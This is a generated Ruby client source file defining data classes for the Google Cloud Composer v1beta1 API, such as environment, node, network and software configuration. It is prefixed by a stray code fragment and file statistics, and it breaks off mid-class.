#{constant} & @options == #{constant}
end
}
end
end
end
end
end
| 24.488372 | 59 | 0.496676 |
e96cd1c858e9890ffdf6fc3c74702d241a835529 | 50,204 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module ComposerV1beta1
# Allowed IP range with user-provided description.
class AllowedIpRange
include Google::Apis::Core::Hashable
# Optional. User-provided description. It must contain at most 300 characters.
# Corresponds to the JSON property `description`
# @return [String]
attr_accessor :description
# IP address or range, defined using CIDR notation, of requests that this rule
# applies to. Examples: `192.168.1.1` or `192.168.0.0/16` or `2001:db8::/32` or `
# 2001:0db8:0000:0042:0000:8a2e:0370:7334`. IP range prefixes should be properly
# truncated. For example, `1.2.3.4/24` should be truncated to `1.2.3.0/24`.
# Similarly, for IPv6, `2001:db8::1/32` should be truncated to `2001:db8::/32`.
# Corresponds to the JSON property `value`
# @return [String]
attr_accessor :value
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@description = args[:description] if args.key?(:description)
@value = args[:value] if args.key?(:value)
end
end
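      # Illustrative construction (not part of the generated client): keyword keys match
      # the attribute names above, and the CIDR value is an example only.
      #
      #   range = Google::Apis::ComposerV1beta1::AllowedIpRange.new(
      #     description: 'office network', value: '203.0.113.0/24')
      #   range.value # => "203.0.113.0/24"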
# The configuration of Cloud SQL instance that is used by the Apache Airflow
# software.
class DatabaseConfig
include Google::Apis::Core::Hashable
# Optional. Cloud SQL machine type used by Airflow database. It has to be one of:
# db-n1-standard-2, db-n1-standard-4, db-n1-standard-8 or db-n1-standard-16. If
# not specified, db-n1-standard-2 will be used.
# Corresponds to the JSON property `machineType`
# @return [String]
attr_accessor :machine_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@machine_type = args[:machine_type] if args.key?(:machine_type)
end
end
# Represents a whole or partial calendar date, such as a birthday. The time of
# day and time zone are either specified elsewhere or are insignificant. The
# date is relative to the Gregorian Calendar. This can represent one of the
# following: * A full date, with non-zero year, month, and day values * A month
# and day value, with a zero year, such as an anniversary * A year on its own,
# with zero month and day values * A year and month value, with a zero day, such
# as a credit card expiration date Related types are google.type.TimeOfDay and `
# google.protobuf.Timestamp`.
class Date
include Google::Apis::Core::Hashable
# Day of a month. Must be from 1 to 31 and valid for the year and month, or 0 to
# specify a year by itself or a year and month where the day isn't significant.
# Corresponds to the JSON property `day`
# @return [Fixnum]
attr_accessor :day
# Month of a year. Must be from 1 to 12, or 0 to specify a year without a month
# and day.
# Corresponds to the JSON property `month`
# @return [Fixnum]
attr_accessor :month
# Year of the date. Must be from 1 to 9999, or 0 to specify a date without a
# year.
# Corresponds to the JSON property `year`
# @return [Fixnum]
attr_accessor :year
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@day = args[:day] if args.key?(:day)
@month = args[:month] if args.key?(:month)
@year = args[:year] if args.key?(:year)
end
end
# A generic empty message that you can re-use to avoid defining duplicated empty
# messages in your APIs. A typical example is to use it as the request or the
# response type of an API method. For instance: service Foo ` rpc Bar(google.
# protobuf.Empty) returns (google.protobuf.Empty); ` The JSON representation for
# `Empty` is empty JSON object ````.
class Empty
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
# The encryption options for the Composer environment and its dependencies.
class EncryptionConfig
include Google::Apis::Core::Hashable
# Optional. Customer-managed Encryption Key available through Google's Key
# Management Service. Cannot be updated. If not specified, Google-managed key
# will be used.
# Corresponds to the JSON property `kmsKeyName`
# @return [String]
attr_accessor :kms_key_name
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@kms_key_name = args[:kms_key_name] if args.key?(:kms_key_name)
end
end
# An environment for running orchestration tasks.
class Environment
include Google::Apis::Core::Hashable
# Configuration information for an environment.
# Corresponds to the JSON property `config`
# @return [Google::Apis::ComposerV1beta1::EnvironmentConfig]
attr_accessor :config
# Output only. The time at which this environment was created.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Optional. User-defined labels for this environment. The labels map can contain
# no more than 64 entries. Entries of the labels map are UTF8 strings that
# comply with the following restrictions: * Keys must conform to regexp: \p`Ll`\
# p`Lo``0,62` * Values must conform to regexp: [\p`Ll`\p`Lo`\p`N`_-]`0,63` *
# Both keys and values are additionally constrained to be <= 128 bytes in size.
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# The resource name of the environment, in the form: "projects/`projectId`/
# locations/`locationId`/environments/`environmentId`" EnvironmentId must start
# with a lowercase letter followed by up to 63 lowercase letters, numbers, or
# hyphens, and cannot end with a hyphen.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The current state of the environment.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. The time at which this environment was last modified.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
# Output only. The UUID (Universally Unique IDentifier) associated with this
# environment. This value is generated when the environment is created.
# Corresponds to the JSON property `uuid`
# @return [String]
attr_accessor :uuid
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@config = args[:config] if args.key?(:config)
@create_time = args[:create_time] if args.key?(:create_time)
@labels = args[:labels] if args.key?(:labels)
@name = args[:name] if args.key?(:name)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
@uuid = args[:uuid] if args.key?(:uuid)
end
end
# Configuration information for an environment.
class EnvironmentConfig
include Google::Apis::Core::Hashable
# Output only. The URI of the Apache Airflow Web UI hosted within this
# environment (see [Airflow web interface](/composer/docs/how-to/accessing/
# airflow-web-interface)).
# Corresponds to the JSON property `airflowUri`
# @return [String]
attr_accessor :airflow_uri
# Output only. The Cloud Storage prefix of the DAGs for this environment.
# Although Cloud Storage objects reside in a flat namespace, a hierarchical file
# tree can be simulated using "/"-delimited object name prefixes. DAG objects
# for this environment reside in a simulated directory with the given prefix.
# Corresponds to the JSON property `dagGcsPrefix`
# @return [String]
attr_accessor :dag_gcs_prefix
# The configuration of Cloud SQL instance that is used by the Apache Airflow
# software.
# Corresponds to the JSON property `databaseConfig`
# @return [Google::Apis::ComposerV1beta1::DatabaseConfig]
attr_accessor :database_config
# The encryption options for the Composer environment and its dependencies.
# Corresponds to the JSON property `encryptionConfig`
# @return [Google::Apis::ComposerV1beta1::EncryptionConfig]
attr_accessor :encryption_config
# Output only. The Kubernetes Engine cluster used to run this environment.
# Corresponds to the JSON property `gkeCluster`
# @return [String]
attr_accessor :gke_cluster
# The configuration settings for Cloud Composer maintenance window. The
# following example: ` "startTime":"2019-08-01T01:00:00Z" "endTime":"2019-08-
# 01T07:00:00Z" "recurrence":"FREQ=WEEKLY;BYDAY=TU,WE" ` would define a
# maintenance window between 01 and 07 hours UTC during each Tuesday and
# Wednesday.
# Corresponds to the JSON property `maintenanceWindow`
# @return [Google::Apis::ComposerV1beta1::MaintenanceWindow]
attr_accessor :maintenance_window
# The configuration information for the Kubernetes Engine nodes running the
# Apache Airflow software.
# Corresponds to the JSON property `nodeConfig`
# @return [Google::Apis::ComposerV1beta1::NodeConfig]
attr_accessor :node_config
# The number of nodes in the Kubernetes Engine cluster that will be used to run
# this environment.
# Corresponds to the JSON property `nodeCount`
# @return [Fixnum]
attr_accessor :node_count
# The configuration information for configuring a Private IP Cloud Composer
# environment.
# Corresponds to the JSON property `privateEnvironmentConfig`
# @return [Google::Apis::ComposerV1beta1::PrivateEnvironmentConfig]
attr_accessor :private_environment_config
# Specifies the selection and configuration of software inside the environment.
# Corresponds to the JSON property `softwareConfig`
# @return [Google::Apis::ComposerV1beta1::SoftwareConfig]
attr_accessor :software_config
# The configuration settings for the Airflow web server App Engine instance.
# Corresponds to the JSON property `webServerConfig`
# @return [Google::Apis::ComposerV1beta1::WebServerConfig]
attr_accessor :web_server_config
# Network-level access control policy for the Airflow web server.
# Corresponds to the JSON property `webServerNetworkAccessControl`
# @return [Google::Apis::ComposerV1beta1::WebServerNetworkAccessControl]
attr_accessor :web_server_network_access_control
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@airflow_uri = args[:airflow_uri] if args.key?(:airflow_uri)
@dag_gcs_prefix = args[:dag_gcs_prefix] if args.key?(:dag_gcs_prefix)
@database_config = args[:database_config] if args.key?(:database_config)
@encryption_config = args[:encryption_config] if args.key?(:encryption_config)
@gke_cluster = args[:gke_cluster] if args.key?(:gke_cluster)
@maintenance_window = args[:maintenance_window] if args.key?(:maintenance_window)
@node_config = args[:node_config] if args.key?(:node_config)
@node_count = args[:node_count] if args.key?(:node_count)
@private_environment_config = args[:private_environment_config] if args.key?(:private_environment_config)
@software_config = args[:software_config] if args.key?(:software_config)
@web_server_config = args[:web_server_config] if args.key?(:web_server_config)
@web_server_network_access_control = args[:web_server_network_access_control] if args.key?(:web_server_network_access_control)
end
end
# Configuration for controlling how IPs are allocated in the GKE cluster.
class IpAllocationPolicy
include Google::Apis::Core::Hashable
# Optional. The IP address range used to allocate IP addresses to pods in the
# cluster. This field is applicable only when `use_ip_aliases` is true. Set to
# blank to have GKE choose a range with the default size. Set to /netmask (e.g. `
# /14`) to have GKE choose a range with a specific netmask. Set to a [CIDR](http:
# //en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) notation (e.g. `10.96.
# 0.0/14`) from the RFC-1918 private networks (e.g. `10.0.0.0/8`, `172.16.0.0/12`
# , `192.168.0.0/16`) to pick a specific range to use. Specify `
# cluster_secondary_range_name` or `cluster_ipv4_cidr_block` but not both.
# Corresponds to the JSON property `clusterIpv4CidrBlock`
# @return [String]
attr_accessor :cluster_ipv4_cidr_block
# Optional. The name of the cluster's secondary range used to allocate IP
# addresses to pods. Specify either `cluster_secondary_range_name` or `
# cluster_ipv4_cidr_block` but not both. This field is applicable only when `
# use_ip_aliases` is true.
# Corresponds to the JSON property `clusterSecondaryRangeName`
# @return [String]
attr_accessor :cluster_secondary_range_name
# Optional. The IP address range of the services IP addresses in this cluster.
# This field is applicable only when `use_ip_aliases` is true. Set to blank to
# have GKE choose a range with the default size. Set to /netmask (e.g. `/14`) to
# have GKE choose a range with a specific netmask. Set to a [CIDR](http://en.
# wikipedia.org/wiki/Classless_Inter-Domain_Routing) notation (e.g. `10.96.0.0/
# 14`) from the RFC-1918 private networks (e.g. `10.0.0.0/8`, `172.16.0.0/12`, `
# 192.168.0.0/16`) to pick a specific range to use. Specify `
# services_secondary_range_name` or `services_ipv4_cidr_block` but not both.
# Corresponds to the JSON property `servicesIpv4CidrBlock`
# @return [String]
attr_accessor :services_ipv4_cidr_block
# Optional. The name of the services' secondary range used to allocate IP
# addresses to the cluster. Specify either `services_secondary_range_name` or `
# services_ipv4_cidr_block` but not both. This field is applicable only when `
# use_ip_aliases` is true.
# Corresponds to the JSON property `servicesSecondaryRangeName`
# @return [String]
attr_accessor :services_secondary_range_name
# Optional. Whether or not to enable Alias IPs in the GKE cluster. If `true`, a
# VPC-native cluster is created.
# Corresponds to the JSON property `useIpAliases`
# @return [Boolean]
attr_accessor :use_ip_aliases
alias_method :use_ip_aliases?, :use_ip_aliases
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@cluster_ipv4_cidr_block = args[:cluster_ipv4_cidr_block] if args.key?(:cluster_ipv4_cidr_block)
@cluster_secondary_range_name = args[:cluster_secondary_range_name] if args.key?(:cluster_secondary_range_name)
@services_ipv4_cidr_block = args[:services_ipv4_cidr_block] if args.key?(:services_ipv4_cidr_block)
@services_secondary_range_name = args[:services_secondary_range_name] if args.key?(:services_secondary_range_name)
@use_ip_aliases = args[:use_ip_aliases] if args.key?(:use_ip_aliases)
end
end
# Image Version information
class ImageVersion
include Google::Apis::Core::Hashable
# Whether it is impossible to create an environment with the image version.
# Corresponds to the JSON property `creationDisabled`
# @return [Boolean]
attr_accessor :creation_disabled
alias_method :creation_disabled?, :creation_disabled
# The string identifier of the ImageVersion, in the form: "composer-x.y.z-
# airflow-a.b(.c)"
# Corresponds to the JSON property `imageVersionId`
# @return [String]
attr_accessor :image_version_id
# Whether this is the default ImageVersion used by Composer during environment
# creation if no input ImageVersion is specified.
# Corresponds to the JSON property `isDefault`
# @return [Boolean]
attr_accessor :is_default
alias_method :is_default?, :is_default
# Represents a whole or partial calendar date, such as a birthday. The time of
# day and time zone are either specified elsewhere or are insignificant. The
# date is relative to the Gregorian Calendar. This can represent one of the
# following: * A full date, with non-zero year, month, and day values * A month
# and day value, with a zero year, such as an anniversary * A year on its own,
# with zero month and day values * A year and month value, with a zero day, such
# as a credit card expiration date Related types are google.type.TimeOfDay and `
# google.protobuf.Timestamp`.
# Corresponds to the JSON property `releaseDate`
# @return [Google::Apis::ComposerV1beta1::Date]
attr_accessor :release_date
# supported python versions
# Corresponds to the JSON property `supportedPythonVersions`
# @return [Array<String>]
attr_accessor :supported_python_versions
# Whether it is impossible to upgrade an environment running with the image
# version.
# Corresponds to the JSON property `upgradeDisabled`
# @return [Boolean]
attr_accessor :upgrade_disabled
alias_method :upgrade_disabled?, :upgrade_disabled
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@creation_disabled = args[:creation_disabled] if args.key?(:creation_disabled)
@image_version_id = args[:image_version_id] if args.key?(:image_version_id)
@is_default = args[:is_default] if args.key?(:is_default)
@release_date = args[:release_date] if args.key?(:release_date)
@supported_python_versions = args[:supported_python_versions] if args.key?(:supported_python_versions)
@upgrade_disabled = args[:upgrade_disabled] if args.key?(:upgrade_disabled)
end
end
# The environments in a project and location.
class ListEnvironmentsResponse
include Google::Apis::Core::Hashable
# The list of environments returned by a ListEnvironmentsRequest.
# Corresponds to the JSON property `environments`
# @return [Array<Google::Apis::ComposerV1beta1::Environment>]
attr_accessor :environments
# The page token used to query for the next page if one exists.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@environments = args[:environments] if args.key?(:environments)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
end
end
# The ImageVersions in a project and location.
class ListImageVersionsResponse
include Google::Apis::Core::Hashable
# The list of supported ImageVersions in a location.
# Corresponds to the JSON property `imageVersions`
# @return [Array<Google::Apis::ComposerV1beta1::ImageVersion>]
attr_accessor :image_versions
# The page token used to query for the next page if one exists.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@image_versions = args[:image_versions] if args.key?(:image_versions)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
end
end
# The response message for Operations.ListOperations.
class ListOperationsResponse
include Google::Apis::Core::Hashable
# The standard List next-page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
# A list of operations that matches the specified filter in the request.
# Corresponds to the JSON property `operations`
# @return [Array<Google::Apis::ComposerV1beta1::Operation>]
attr_accessor :operations
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@operations = args[:operations] if args.key?(:operations)
end
end
# The configuration settings for Cloud Composer maintenance window. The
# following example: ` "startTime":"2019-08-01T01:00:00Z" "endTime":"2019-08-
# 01T07:00:00Z" "recurrence":"FREQ=WEEKLY;BYDAY=TU,WE" ` would define a
# maintenance window between 01 and 07 hours UTC during each Tuesday and
# Wednesday.
class MaintenanceWindow
include Google::Apis::Core::Hashable
# Required. Maintenance window end time. It is used only to calculate the
# duration of the maintenance window. The value for end_time must be in the
# future, relative to `start_time`.
# Corresponds to the JSON property `endTime`
# @return [String]
attr_accessor :end_time
# Required. Maintenance window recurrence. Format is a subset of [RFC-5545](
# https://tools.ietf.org/html/rfc5545) `RRULE`. The only allowed values for `
# FREQ` field are `FREQ=DAILY` and `FREQ=WEEKLY;BYDAY=...` Example values: `FREQ=
# WEEKLY;BYDAY=TU,WE`, `FREQ=DAILY`.
# Corresponds to the JSON property `recurrence`
# @return [String]
attr_accessor :recurrence
# Required. Start time of the first recurrence of the maintenance window.
# Corresponds to the JSON property `startTime`
# @return [String]
attr_accessor :start_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@end_time = args[:end_time] if args.key?(:end_time)
@recurrence = args[:recurrence] if args.key?(:recurrence)
@start_time = args[:start_time] if args.key?(:start_time)
end
end
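      # Illustrative construction (not part of the generated client), mirroring the example
      # in the class comment; the timestamps and recurrence rule are sample values.
      #
      #   window = Google::Apis::ComposerV1beta1::MaintenanceWindow.new(
      #     start_time: '2019-08-01T01:00:00Z',
      #     end_time:   '2019-08-01T07:00:00Z',
      #     recurrence: 'FREQ=WEEKLY;BYDAY=TU,WE')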
# The configuration information for the Kubernetes Engine nodes running the
# Apache Airflow software.
class NodeConfig
include Google::Apis::Core::Hashable
# Optional. The disk size in GB used for node VMs. Minimum size is 20GB. If
# unspecified, defaults to 100GB. Cannot be updated.
# Corresponds to the JSON property `diskSizeGb`
# @return [Fixnum]
attr_accessor :disk_size_gb
# Configuration for controlling how IPs are allocated in the GKE cluster.
# Corresponds to the JSON property `ipAllocationPolicy`
# @return [Google::Apis::ComposerV1beta1::IpAllocationPolicy]
attr_accessor :ip_allocation_policy
# Optional. The Compute Engine [zone](/compute/docs/regions-zones) in which to
# deploy the VMs used to run the Apache Airflow software, specified as a [
# relative resource name](/apis/design/resource_names#relative_resource_name).
# For example: "projects/`projectId`/zones/`zoneId`". This `location` must
# belong to the enclosing environment's project and location. If both this field
# and `nodeConfig.machineType` are specified, `nodeConfig.machineType` must
# belong to this `location`; if both are unspecified, the service will pick a
# zone in the Compute Engine region corresponding to the Cloud Composer location,
# and propagate that choice to both fields. If only one field (`location` or `
# nodeConfig.machineType`) is specified, the location information from the
# specified field will be propagated to the unspecified field.
# Corresponds to the JSON property `location`
# @return [String]
attr_accessor :location
# Optional. The Compute Engine [machine type](/compute/docs/machine-types) used
# for cluster instances, specified as a [relative resource name](/apis/design/
# resource_names#relative_resource_name). For example: "projects/`projectId`/
# zones/`zoneId`/machineTypes/`machineTypeId`". The `machineType` must belong to
# the enclosing environment's project and location. If both this field and `
# nodeConfig.location` are specified, this `machineType` must belong to the `
# nodeConfig.location`; if both are unspecified, the service will pick a zone in
# the Compute Engine region corresponding to the Cloud Composer location, and
# propagate that choice to both fields. If exactly one of this field and `
# nodeConfig.location` is specified, the location information from the specified
# field will be propagated to the unspecified field. The `machineTypeId` must
# not be a [shared-core machine type](/compute/docs/machine-types#sharedcore).
# If this field is unspecified, the `machineTypeId` defaults to "n1-standard-1".
# Corresponds to the JSON property `machineType`
# @return [String]
attr_accessor :machine_type
# Optional. The maximum number of pods per node in the Cloud Composer GKE
# cluster. The value must be between 8 and 110 and it can be set only if the
# environment is VPC-native. The default value is 32. Values of this field will
# be propagated both to the `default-pool` node pool of the newly created GKE
# cluster, and to the default "Maximum Pods per Node" value which is used for
# newly created node pools if their value is not explicitly set during node pool
# creation. For more information, see [Optimizing IP address allocation] (https:/
# /cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr). Cannot be
# updated.
# Corresponds to the JSON property `maxPodsPerNode`
# @return [Fixnum]
attr_accessor :max_pods_per_node
# Optional. The Compute Engine network to be used for machine communications,
# specified as a [relative resource name](/apis/design/resource_names#
# relative_resource_name). For example: "projects/`projectId`/global/networks/`
# networkId`". If unspecified, the default network in the environment's project
# is used. If a [Custom Subnet Network](/vpc/docs/vpc#vpc_networks_and_subnets)
# is provided, `nodeConfig.subnetwork` must also be provided. For [Shared VPC](/
# vpc/docs/shared-vpc) subnetwork requirements, see `nodeConfig.subnetwork`.
# Corresponds to the JSON property `network`
# @return [String]
attr_accessor :network
# Optional. The set of Google API scopes to be made available on all node VMs.
# If `oauth_scopes` is empty, defaults to ["https://www.googleapis.com/auth/
# cloud-platform"]. Cannot be updated.
# Corresponds to the JSON property `oauthScopes`
# @return [Array<String>]
attr_accessor :oauth_scopes
# Optional. The Google Cloud Platform Service Account to be used by the node VMs.
# If a service account is not specified, the "default" Compute Engine service
# account is used. Cannot be updated.
# Corresponds to the JSON property `serviceAccount`
# @return [String]
attr_accessor :service_account
# Optional. The Compute Engine subnetwork to be used for machine communications,
# specified as a [relative resource name](/apis/design/resource_names#
# relative_resource_name). For example: "projects/`projectId`/regions/`regionId`/
# subnetworks/`subnetworkId`" If a subnetwork is provided, `nodeConfig.network`
# must also be provided, and the subnetwork must belong to the enclosing
# environment's project and location.
# Corresponds to the JSON property `subnetwork`
# @return [String]
attr_accessor :subnetwork
# Optional. The list of instance tags applied to all node VMs. Tags are used to
# identify valid sources or targets for network firewalls. Each tag within the
# list must comply with [RFC1035](https://www.ietf.org/rfc/rfc1035.txt). Cannot
# be updated.
# Corresponds to the JSON property `tags`
# @return [Array<String>]
attr_accessor :tags
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@disk_size_gb = args[:disk_size_gb] if args.key?(:disk_size_gb)
@ip_allocation_policy = args[:ip_allocation_policy] if args.key?(:ip_allocation_policy)
@location = args[:location] if args.key?(:location)
@machine_type = args[:machine_type] if args.key?(:machine_type)
@max_pods_per_node = args[:max_pods_per_node] if args.key?(:max_pods_per_node)
@network = args[:network] if args.key?(:network)
@oauth_scopes = args[:oauth_scopes] if args.key?(:oauth_scopes)
@service_account = args[:service_account] if args.key?(:service_account)
@subnetwork = args[:subnetwork] if args.key?(:subnetwork)
@tags = args[:tags] if args.key?(:tags)
end
end
# This resource represents a long-running operation that is the result of a
# network API call.
class Operation
include Google::Apis::Core::Hashable
# If the value is `false`, it means the operation is still in progress. If `true`
# , the operation is completed, and either `error` or `response` is available.
# Corresponds to the JSON property `done`
# @return [Boolean]
attr_accessor :done
alias_method :done?, :done
# The `Status` type defines a logical error model that is suitable for different
# programming environments, including REST APIs and RPC APIs. It is used by [
# gRPC](https://github.com/grpc). Each `Status` message contains three pieces of
# data: error code, error message, and error details. You can find out more
# about this error model and how to work with it in the [API Design Guide](https:
# //cloud.google.com/apis/design/errors).
# Corresponds to the JSON property `error`
# @return [Google::Apis::ComposerV1beta1::Status]
attr_accessor :error
# Service-specific metadata associated with the operation. It typically contains
# progress information and common metadata such as create time. Some services
# might not provide such metadata. Any method that returns a long-running
# operation should document the metadata type, if any.
# Corresponds to the JSON property `metadata`
# @return [Hash<String,Object>]
attr_accessor :metadata
# The server-assigned name, which is only unique within the same service that
# originally returns it. If you use the default HTTP mapping, the `name` should
# be a resource name ending with `operations/`unique_id``.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The normal response of the operation in case of success. If the original
# method returns no data on success, such as `Delete`, the response is `google.
# protobuf.Empty`. If the original method is standard `Get`/`Create`/`Update`,
# the response should be the resource. For other methods, the response should
# have the type `XxxResponse`, where `Xxx` is the original method name. For
# example, if the original method name is `TakeSnapshot()`, the inferred
# response type is `TakeSnapshotResponse`.
# Corresponds to the JSON property `response`
# @return [Hash<String,Object>]
attr_accessor :response
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@done = args[:done] if args.key?(:done)
@error = args[:error] if args.key?(:error)
@metadata = args[:metadata] if args.key?(:metadata)
@name = args[:name] if args.key?(:name)
@response = args[:response] if args.key?(:response)
end
end
# Metadata describing an operation.
class OperationMetadata
include Google::Apis::Core::Hashable
# Output only. The time the operation was submitted to the server.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Output only. The time when the operation terminated, regardless of its success.
# This field is unset if the operation is still ongoing.
# Corresponds to the JSON property `endTime`
# @return [String]
attr_accessor :end_time
# Output only. The type of operation being performed.
# Corresponds to the JSON property `operationType`
# @return [String]
attr_accessor :operation_type
# Output only. The resource being operated on, as a [relative resource name]( /
# apis/design/resource_names#relative_resource_name).
# Corresponds to the JSON property `resource`
# @return [String]
attr_accessor :resource
# Output only. The UUID of the resource being operated on.
# Corresponds to the JSON property `resourceUuid`
# @return [String]
attr_accessor :resource_uuid
# Output only. The current operation state.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@create_time = args[:create_time] if args.key?(:create_time)
@end_time = args[:end_time] if args.key?(:end_time)
@operation_type = args[:operation_type] if args.key?(:operation_type)
@resource = args[:resource] if args.key?(:resource)
@resource_uuid = args[:resource_uuid] if args.key?(:resource_uuid)
@state = args[:state] if args.key?(:state)
end
end
# Configuration options for the private GKE cluster in a Cloud Composer
# environment.
class PrivateClusterConfig
include Google::Apis::Core::Hashable
# Optional. If `true`, access to the public endpoint of the GKE cluster is
# denied.
# Corresponds to the JSON property `enablePrivateEndpoint`
# @return [Boolean]
attr_accessor :enable_private_endpoint
alias_method :enable_private_endpoint?, :enable_private_endpoint
# Optional. The CIDR block from which IPv4 range for GKE master will be reserved.
# If left blank, the default value of '172.16.0.0/23' is used.
# Corresponds to the JSON property `masterIpv4CidrBlock`
# @return [String]
attr_accessor :master_ipv4_cidr_block
# Output only. The IP range in CIDR notation to use for the hosted master
# network. This range is used for assigning internal IP addresses to the cluster
# master or set of masters and to the internal load balancer virtual IP. This
# range must not overlap with any other ranges in use within the cluster's
# network.
# Corresponds to the JSON property `masterIpv4ReservedRange`
# @return [String]
attr_accessor :master_ipv4_reserved_range
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@enable_private_endpoint = args[:enable_private_endpoint] if args.key?(:enable_private_endpoint)
@master_ipv4_cidr_block = args[:master_ipv4_cidr_block] if args.key?(:master_ipv4_cidr_block)
@master_ipv4_reserved_range = args[:master_ipv4_reserved_range] if args.key?(:master_ipv4_reserved_range)
end
end
# The configuration information for configuring a Private IP Cloud Composer
# environment.
class PrivateEnvironmentConfig
include Google::Apis::Core::Hashable
# Optional. The CIDR block from which IP range in tenant project will be
# reserved for Cloud SQL. Needs to be disjoint from web_server_ipv4_cidr_block
# Corresponds to the JSON property `cloudSqlIpv4CidrBlock`
# @return [String]
attr_accessor :cloud_sql_ipv4_cidr_block
# Optional. If `true`, a Private IP Cloud Composer environment is created. If
# this field is set to true, `IPAllocationPolicy.use_ip_aliases` must be set to
# true.
# Corresponds to the JSON property `enablePrivateEnvironment`
# @return [Boolean]
attr_accessor :enable_private_environment
alias_method :enable_private_environment?, :enable_private_environment
# Configuration options for the private GKE cluster in a Cloud Composer
# environment.
# Corresponds to the JSON property `privateClusterConfig`
# @return [Google::Apis::ComposerV1beta1::PrivateClusterConfig]
attr_accessor :private_cluster_config
# Optional. The CIDR block from which IP range for web server will be reserved.
# Needs to be disjoint from private_cluster_config.master_ipv4_cidr_block and
# cloud_sql_ipv4_cidr_block.
# Corresponds to the JSON property `webServerIpv4CidrBlock`
# @return [String]
attr_accessor :web_server_ipv4_cidr_block
# Output only. The IP range reserved for the tenant project's App Engine VMs.
# Corresponds to the JSON property `webServerIpv4ReservedRange`
# @return [String]
attr_accessor :web_server_ipv4_reserved_range
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@cloud_sql_ipv4_cidr_block = args[:cloud_sql_ipv4_cidr_block] if args.key?(:cloud_sql_ipv4_cidr_block)
@enable_private_environment = args[:enable_private_environment] if args.key?(:enable_private_environment)
@private_cluster_config = args[:private_cluster_config] if args.key?(:private_cluster_config)
@web_server_ipv4_cidr_block = args[:web_server_ipv4_cidr_block] if args.key?(:web_server_ipv4_cidr_block)
@web_server_ipv4_reserved_range = args[:web_server_ipv4_reserved_range] if args.key?(:web_server_ipv4_reserved_range)
end
end
# Restart Airflow web server.
class RestartWebServerRequest
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
# Specifies the selection and configuration of software inside the environment.
class SoftwareConfig
include Google::Apis::Core::Hashable
# Optional. Apache Airflow configuration properties to override. Property keys
# contain the section and property names, separated by a hyphen, for example "
# core-dags_are_paused_at_creation". Section names must not contain hyphens ("-")
# , opening square brackets ("["), or closing square brackets ("]"). The
# property name must not be empty and must not contain an equals sign ("=") or
# semicolon (";"). Section and property names must not contain a period (".").
# Apache Airflow configuration property names must be written in [snake_case](
# https://en.wikipedia.org/wiki/Snake_case). Property values can contain any
# character, and can be written in any lower/upper case format. Certain Apache
# Airflow configuration property values are [blocked](/composer/docs/concepts/
# airflow-configurations), and cannot be overridden.
# Corresponds to the JSON property `airflowConfigOverrides`
# @return [Hash<String,String>]
attr_accessor :airflow_config_overrides
# Optional. Additional environment variables to provide to the Apache Airflow
# scheduler, worker, and webserver processes. Environment variable names must
# match the regular expression `a-zA-Z_*`. They cannot specify Apache Airflow
# software configuration overrides (they cannot match the regular expression `
# AIRFLOW__[A-Z0-9_]+__[A-Z0-9_]+`), and they cannot match any of the following
# reserved names: * `AIRFLOW_HOME` * `C_FORCE_ROOT` * `CONTAINER_NAME` * `
# DAGS_FOLDER` * `GCP_PROJECT` * `GCS_BUCKET` * `GKE_CLUSTER_NAME` * `
# SQL_DATABASE` * `SQL_INSTANCE` * `SQL_PASSWORD` * `SQL_PROJECT` * `SQL_REGION`
# * `SQL_USER`
# Corresponds to the JSON property `envVariables`
# @return [Hash<String,String>]
attr_accessor :env_variables
# The version of the software running in the environment. This encapsulates both
# the version of Cloud Composer functionality and the version of Apache Airflow.
